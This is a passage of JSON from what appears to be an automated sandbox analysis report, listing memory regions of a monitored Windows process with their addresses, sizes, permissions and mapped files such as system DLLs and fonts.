"permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41222144, "type": "region", "version": 1 }, "end_va": 41226239, "entry_point": 0, "filename": null, "id": "region_180", "name": "pagefile_0x0000000002750000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41222144, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41287680, "type": "region", "version": 1 }, "end_va": 41291775, "entry_point": 0, "filename": null, "id": "region_181", "name": "pagefile_0x0000000002760000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41287680, "timestamp": 
"00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 41353216, "type": "region", "version": 1 }, "end_va": 41357311, "entry_point": 0, "filename": null, "id": "region_182", "name": "private_0x0000000002770000", "norm_filename": null, "region_type": "private_memory", "start_va": 41353216, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 41426943, "entry_point": 0, "filename": null, "id": "region_183", "name": "pagefile_0x0000000002780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41418752, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 41484288, "type": "region", "version": 1 }, "end_va": 41549823, "entry_point": 0, "filename": null, "id": "region_184", "name": "private_0x0000000002790000", "norm_filename": null, "region_type": "private_memory", "start_va": 41484288, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 41549824, "type": "region", "version": 1 }, "end_va": 41656319, "entry_point": 41549824, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_185", "name": "devobj.dll", 
"norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 41549824, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41680896, "type": "region", "version": 1 }, "end_va": 41684991, "entry_point": 41680896, "filename": "\\Windows\\System32\\msxml6r.dll", "id": "region_186", "name": "msxml6r.dll", "norm_filename": "c:\\windows\\system32\\msxml6r.dll", "region_type": "memory_mapped_file", "start_va": 41680896, "timestamp": "00:00:32.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 41746432, "type": "region", "version": 1 }, "end_va": 41750527, "entry_point": 0, "filename": null, "id": "region_187", "name": "pagefile_0x00000000027d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41746432, "timestamp": "00:00:32.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 41811968, "type": "region", "version": 1 }, "end_va": 42860543, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x00000000027e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41811968, "timestamp": "00:00:32.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 126976, "start_va": 42860544, "type": 
"region", "version": 1 }, "end_va": 42987519, "entry_point": 42860544, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db", "id": "region_189", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db", "region_type": "memory_mapped_file", "start_va": 42860544, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 42991616, "type": "region", "version": 1 }, "end_va": 42995711, "entry_point": 0, "filename": null, "id": "region_190", "name": "private_0x0000000002900000", "norm_filename": null, "region_type": "private_memory", "start_va": 42991616, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 43057152, "type": "region", "version": 1 }, "end_va": 43581439, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x0000000002910000", "norm_filename": null, "region_type": "private_memory", "start_va": 43057152, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 43589631, "entry_point": 0, "filename": null, "id": "region_192", "name": "pagefile_0x0000000002990000", "norm_filename": null, 
"region_type": "pagefile_backed_memory", "start_va": 43581440, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 43716607, "entry_point": 43646976, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_193", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 43646976, "timestamp": "00:00:32.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 43843584, "type": "region", "version": 1 }, "end_va": 43909119, "entry_point": 0, "filename": null, "id": "region_194", "name": "private_0x00000000029d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43843584, "timestamp": "00:00:32.390", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 331776, "start_va": 43909120, "type": "region", "version": 1 }, "end_va": 44240895, "entry_point": 43909120, "filename": "\\Windows\\Fonts\\segoeuil.ttf", "id": "region_195", "name": "segoeuil.ttf", "norm_filename": "c:\\windows\\fonts\\segoeuil.ttf", "region_type": "memory_mapped_file", "start_va": 43909120, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 44367872, "type": "region", 
"version": 1 }, "end_va": 45416447, "entry_point": 0, "filename": null, "id": "region_196", "name": "private_0x0000000002a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 44367872, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 45416448, "type": "region", "version": 1 }, "end_va": 45547519, "entry_point": 0, "filename": null, "id": "region_197", "name": "private_0x0000000002b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 45416448, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 45613056, "type": "region", "version": 1 }, "end_va": 46661631, "entry_point": 0, "filename": null, "id": "region_198", "name": "private_0x0000000002b80000", "norm_filename": null, "region_type": "private_memory", "start_va": 45613056, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 46661632, "type": "region", "version": 1 }, "end_va": 48758783, "entry_point": 0, "filename": null, "id": "region_199", "name": "private_0x0000000002c80000", "norm_filename": null, "region_type": "private_memory", "start_va": 46661632, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 
1253376, "start_va": 48758784, "type": "region", "version": 1 }, "end_va": 50012159, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x0000000002e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 48758784, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 50069504, "type": "region", "version": 1 }, "end_va": 51118079, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x0000000002fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 50069504, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 51118080, "type": "region", "version": 1 }, "end_va": 51245055, "entry_point": 0, "filename": null, "id": "region_202", "name": "private_0x00000000030c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51118080, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51249152, "type": "region", "version": 1 }, "end_va": 52297727, "entry_point": 0, "filename": null, "id": "region_203", "name": "private_0x00000000030e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51249152, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 
"permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 52297728, "type": "region", "version": 1 }, "end_va": 53346303, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x00000000031e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 52297728, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 53346304, "type": "region", "version": 1 }, "end_va": 54394879, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x00000000032e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 53346304, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 54394880, "type": "region", "version": 1 }, "end_va": 62783487, "entry_point": 0, "filename": null, "id": "region_206", "name": "pagefile_0x00000000033e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 54394880, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 62783488, "type": "region", "version": 1 }, "end_va": 64880639, "entry_point": 0, "filename": null, "id": "region_207", "name": "private_0x0000000003be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 62783488, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 64880640, "type": "region", "version": 1 }, "end_va": 74514431, "entry_point": 64880640, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_208", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 64880640, "timestamp": "00:00:32.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 74514432, "type": "region", "version": 1 }, "end_va": 75034623, "entry_point": 74514432, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_209", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 74514432, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 75104256, "type": "region", "version": 1 }, "end_va": 76152831, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x00000000047a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75104256, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 76152832, "type": "region", "version": 1 }, "end_va": 77201407, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x00000000048a0000", "norm_filename": null, 
"region_type": "private_memory", "start_va": 76152832, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 77266944, "type": "region", "version": 1 }, "end_va": 78315519, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000049b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 77266944, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 131072, "start_va": 78315520, "type": "region", "version": 1 }, "end_va": 78446591, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x0000000004ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 78315520, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 78577664, "type": "region", "version": 1 }, "end_va": 79626239, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x0000000004af0000", "norm_filename": null, "region_type": "private_memory", "start_va": 78577664, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 409600, "start_va": 79626240, "type": "region", "version": 1 }, "end_va": 80035839, "entry_point": 79626240, "filename": "\\Windows\\Fonts\\seguisb.ttf", "id": 
"region_215", "name": "seguisb.ttf", "norm_filename": "c:\\windows\\fonts\\seguisb.ttf", "region_type": "memory_mapped_file", "start_va": 79626240, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 80084992, "type": "region", "version": 1 }, "end_va": 80150527, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000004c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 80084992, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 80543744, "type": "region", "version": 1 }, "end_va": 81592319, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000004cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80543744, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 81788928, "type": "region", "version": 1 }, "end_va": 82313215, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000004e00000", "norm_filename": null, "region_type": "private_memory", "start_va": 81788928, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 82313216, 
"type": "region", "version": 1 }, "end_va": 90701823, "entry_point": 0, "filename": null, "id": "region_219", "name": "pagefile_0x0000000004e80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 82313216, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 91095040, "type": "region", "version": 1 }, "end_va": 92143615, "entry_point": 0, "filename": null, "id": "region_220", "name": "private_0x00000000056e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 91095040, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 92143616, "type": "region", "version": 1 }, "end_va": 93192191, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x00000000057e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 92143616, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 93519872, "type": "region", "version": 1 }, "end_va": 94044159, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000005930000", "norm_filename": null, "region_type": "private_memory", "start_va": 93519872, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", 
"writable" ], "ref_process_dump": null, "size": 524288, "start_va": 94175232, "type": "region", "version": 1 }, "end_va": 94699519, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x00000000059d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 94175232, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 94896128, "type": "region", "version": 1 }, "end_va": 94961663, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x0000000005a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 94896128, "timestamp": "00:00:32.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 94961664, "type": "region", "version": 1 }, "end_va": 99155967, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000005a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 94961664, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16777216, "start_va": 99155968, "type": "region", "version": 1 }, "end_va": 115933183, "entry_point": 0, "filename": null, "id": "region_226", "name": "pagefile_0x0000000005e90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 99155968, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump 
was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 774144, "start_va": 116654080, "type": "region", "version": 1 }, "end_va": 117428223, "entry_point": 116654080, "filename": "\\Windows\\Fonts\\arial.ttf", "id": "region_227", "name": "arial.ttf", "norm_filename": "c:\\windows\\fonts\\arial.ttf", "region_type": "memory_mapped_file", "start_va": 116654080, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 117637120, "type": "region", "version": 1 }, "end_va": 118161407, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x0000000007030000", "norm_filename": null, "region_type": "private_memory", "start_va": 117637120, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 118161408, "type": "region", "version": 1 }, "end_va": 122355711, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x00000000070b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 118161408, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 123404288, "type": "region", "version": 1 }, "end_va": 124452863, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x00000000075b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 123404288, "timestamp": 
"00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 124452864, "type": "region", "version": 1 }, "end_va": 132841471, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x00000000076b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 124452864, "timestamp": "00:00:32.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 132841472, "type": "region", "version": 1 }, "end_va": 137039871, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x0000000007eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 132841472, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 137101312, "type": "region", "version": 1 }, "end_va": 141299711, "entry_point": 0, "filename": null, "id": "region_233", "name": "private_0x00000000082c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 137101312, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 141361152, "type": "region", "version": 1 }, "end_va": 145559551, "entry_point": 0, "filename": null, "id": "region_234", "name": "private_0x00000000086d0000", 
"norm_filename": null, "region_type": "private_memory", "start_va": 141361152, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 145620992, "type": "region", "version": 1 }, "end_va": 150601727, "entry_point": 0, "filename": null, "id": "region_235", "name": "private_0x0000000008ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 145620992, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 150601728, "type": "region", "version": 1 }, "end_va": 154796031, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x0000000008fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 150601728, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 156434432, "type": "region", "version": 1 }, "end_va": 157483007, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x0000000009530000", "norm_filename": null, "region_type": "private_memory", "start_va": 156434432, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 928972800, "type": "region", "version": 1 }, "end_va": 929038335, 
"entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x00000000375f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 928972800, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1878982656, "type": "region", "version": 1 }, "end_va": 1879048191, "entry_point": 0, "filename": null, "id": "region_239", "name": "private_0x000000006fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1878982656, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 208896, "start_va": 1960181760, "type": "region", "version": 1 }, "end_va": 1960390655, "entry_point": 1960181760, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_240", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1960181760, "timestamp": "00:00:32.394", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002649088, "filename": "\\Windows\\System32\\user32.dll", "id": "region_241", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", 
"start_va": 2002649088, "timestamp": "00:00:32.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003697664, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_242", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:00:32.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_243", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:00:32.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006777856, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_244", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:00:32.724", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ 
